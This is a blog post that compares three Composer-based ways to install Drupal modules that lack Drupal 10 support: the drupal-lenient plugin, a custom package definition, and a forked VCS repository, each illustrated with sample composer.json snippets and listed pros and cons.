{ "name": "vendor/project", "repositories": [ { "type": "composer", "url": "https://packages.drupal.org/8" } ], "require": { "drupal/core": "^10.0.0", "drupal/my_module": "1.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, "drupal-lenient": { "allowed-list": [ "drupal/my_module" ] }, "patches": { "drupal/my_module": { "3289029: Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2022-06-16/my_module.1.x-dev.rector.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } }Note the Drupal-Lenient allow list. Also note that you will need to make sure and install the plugin before trying to install the module that doesn’t support Drupal 10 in this case. If you want an excellent step-by-step, Matt put one together in the Readme.
The pros:
- Easy-peasy to install
- Feeds off the original packagist packages, so if there is an upgrade, you don’t have to do anything special to transition
The cons:
- Lenient has the control and may cause inexplicable errors when updating due to unsupported core versions
- PHP devs not familiar with Drupal Lenient won’t know to look for it
- Flaky experiences when switching in and out of branches that include this plugin. If you context switch a lot, be prepared to handle some errors due to Composer’s challenges maintaining state between branches.
- Patches to other dependencies inside composer.json still require you to run through some hoops
If you want more control over what the module can and cannot do, while keeping the core of Composer functionality without adding yet another plugin, check out this method. What we will do here is find out what version the patch or merge request is being applied against. It should be stated in the issue queue and by best practices is a dev version.
If you are a perfectionist, you can use composer install -vvv to find the url or cache file that the module came from for packages.drupal.org. It is usually one of https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json or https://packages.drupal.org/files/packages/8/p2/drupal/my_module~dev.json. You will note that the Composer cache system follows a very similar structure, swapping out certain characters with dashes.
With this information, you can grab the exact package as it’s defined in the Drupal packagist. Find the version you want, and then get it into your project’s composer.json.
Let’s use Context Active Trail as an example, because at the time of this writing, there is no Drupal 10 release available.
Looking through the issue queue, we see Automated Drupal 10 compatibility fixes, which has a patch on it at. I grab the Composer package info and paste the 2.0-dev info into my composer.json under the “repositories” section as a type “package.”
Which should make your project look something like this:
{ "name": "vendor/project", "repositories": [ { "type": "package", "package": { "keywords": [ "Drupal", "Context", "Active trail", "Breadcrumbs" ], "homepage": "https://www.drupal.org/project/context_active_trail", "version": "dev-2.x", "version_normalized": "dev-2.x", "license": "GPL-2.0+", "authors": [ { "name": "Jigar Mehta (jigarius)", "homepage": "https://jigarius.com/", "role": "Maintainer" }, { "name": "jigarius", "homepage": "https://www.drupal.org/user/2492730" }, { "name": "vasi", "homepage": "https://www.drupal.org/user/390545" } ], "support": { "source": "https://git.drupalcode.org/project/context_active_trail", "issues": "https://www.drupal.org/project/issues/context_active_trail" }, "source": { "type": "git", "url": "https://git.drupalcode.org/project/context_active_trail.git", "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e" }, "type": "drupal-module", "uid": "context_active_trail-3192784", "name": "drupal/context_active_trail", "extra": { "branch-alias": { "dev-2.x": "2.x-dev" }, "drupal": { "version": "8.x-2.0-rc2+1-dev", "datestamp": "1630867980", "security-coverage": { "status": "not-covered", "message": "Project has not opted into security advisory coverage!" } } }, "description": "Set the active trail based on context.", "require": { "drupal/context": "^4.1", "drupal/core": "^8.8 || ^9" } } }, { "type": "composer", "url": "https://packages.drupal.org/8" } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "2.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, }, "patches": { }, "patchLevel": { "drupal/core": "-p2" }, } }Now let’s change our version criteria:
… "description": "Set the active trail based on context.", "require": { "drupal/context": "^4.1", "drupal/core": "^8.8 || ^9 || ^10" } …And then add our patch:
… extra": { "composer-exit-on-patch-failure": true, }, "patches": { "drupal/context_active_trail": { "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } …Here, you will need to look to see if the patch is patching composer.json. If it is, you will need to modify your package information accordingly. For example, in this one, the fixer changes drupal/context from ^4.1 to ^5.0.0-rc1. That change looks like this:
… "description": "Set the active trail based on context.", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } …Lastly, sometimes you run into some complications with the order packages are picked up by Composer. You may need to add an exclude element to the Drupal packagist.
… { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] }, …Our final composer.json for our project could look something like this with all the edits:
{ "name": "vendor/project", "repositories": [ { "type": "package", "package": { "keywords": [ "Drupal", "Context", "Active trail", "Breadcrumbs" ], "homepage": "https://www.drupal.org/project/context_active_trail", "version": "dev-2.x", "version_normalized": "dev-2.x", "license": "GPL-2.0+", "authors": [ { "name": "Jigar Mehta (jigarius)", "homepage": "https://jigarius.com/", "role": "Maintainer" }, { "name": "jigarius", "homepage": "https://www.drupal.org/user/2492730" }, { "name": "vasi", "homepage": "https://www.drupal.org/user/390545" } ], "support": { "source": "https://git.drupalcode.org/project/context_active_trail", "issues": "https://www.drupal.org/project/issues/context_active_trail" }, "source": { "type": "git", "url": "https://git.drupalcode.org/project/context_active_trail.git", "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e" }, "type": "drupal-module", "uid": "context_active_trail-3192784", "name": "drupal/context_active_trail", "extra": { "branch-alias": { "dev-2.x": "2.x-dev" }, "drupal": { "version": "8.x-2.0-rc2+1-dev", "datestamp": "1630867980", "security-coverage": { "status": "not-covered", "message": "Project has not opted into security advisory coverage!" } } }, "description": "Set the active trail based on context.", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } } }, { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "2.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, }, "patches": { "drupal/context_active_trail": { "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } }The pros:
- Uses more core Composer functionality
- A PHP developer will better understand what’s going on here
- You are in complete control of how this module package and version are defined
- All the work is in one file
The cons:
- Requires some understanding of how composer.json, packagists, and the magic of Drupal’s packagist all work
- That’s a messy composer.json for the project
- If you have to use exclude, you have to leave it up to outside forces to let you know when that module does finally put out and actual D10-ready version, and then undo all of this work
Standard PHP composer best practice says that if you make modifications to a package, fork it, maintain your modifications, and provide a pull request if it’s functionality you wish to contribute back. You can use this same approach with Drupal modules as well. Some may even say that’s what issue forks are for! That said, issue forks come with the downside that sometimes they go away, or are overridden with changes you don’t want. They are a moving dot.
For the sake of this example, let’s assume that we have forked the module on GitHub to https://github.com/fourkitchens/context_active_trail.git. If you don’t know how to make a fork, simply do the following:
- Clone the module to your local computer using the git instructions for the module in question
- Check out the branch you want to base your changes on
- Create a new repository on GitHub
- Add it as a remote git remote add github git@github.com:fourkitchens/context_active_trail.git
- Push it! git push github 8.x-2.x
You can do this with a version of the module that is in a merge request in Drupal.org’s issue queue, too. That way you won’t have to reapply all the changes. However, if your changes are in a patch file, consider adding them to the module at this time using your favorite patching method. Push all your changes to the github remote.
If the patch files don’t have changes to composer.json, or if the module doesn’t have one, you will likely want to provide at least a bare-bones one that contains something like the following and commit it:
{ "name": "drupal/context_active_trail", "type": "drupal-module", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } }This will tell Composer what it needs to know inside the project about dependencies. This project already had a composer.json, so I needed to add the changes from the patch to it.
Inside our Drupal project we are working on, we need to add a new entry to the repositories section. It will look something like this:
{ "type": "vcs", "url": "https://github.com/fourkitchens/context_active_trail.git" },The VCS type repository entry tells Composer to look at the repository and poll for all its branches and tags. These will be your new version numbers.
Much like in the “Custom Package” example, you may need to add an exclude property to the Drupal packagist entry.
… { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] }, …Now, since Drupal packagist isn’t here to give Composer some version aliases, we have to use the old notation dev-BRANCHNAME for our version. Our require entry will look something like this:
"drupal/context_active_trail": "dev-8.x-2.x",Since we already added our patches as a commit to the module, this is all you need. Your final composer.json for your project would look like this:
{ "name": "vendor/project", "repositories": [ { "type": "vcs", "url": "https://github.com/fourkitchens/context_active_trail.git" }, { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "dev-8.x-2.x", } }It makes for a much cleaner project json, but now you’ve split the work into two locations, requiring some synchronization. However, if multiple sites of yours use this same module and need the same fixes, this absolutely has the least resistance and ability to get those changes out more quickly.
The pros:
- Reusability
- Two smaller, simpler chunks of work
- Any PHP developer should be able to debug this setup as it uses Composer best practices. This method will be used in any project with any framework in the PHP ecosystem.
The cons:
- Changes are in two separate places
- Which patches are applied isn’t obvious in the composer.json and require looking through the commit history on the forked repository
- Requires maintenance and synchronization when upgrades happen
As with almost everything out there, there are multiple ways to achieve the same goal. I hope this brings awareness, and helps provide the flexibility you need when upgrading Drupal to a new major version. Obviously, each solution has strengths, and you may need to mix it up to get the results you want.
The post Using Composer for modules not ready for the next major version of Drupal appeared first on Four Kitchens.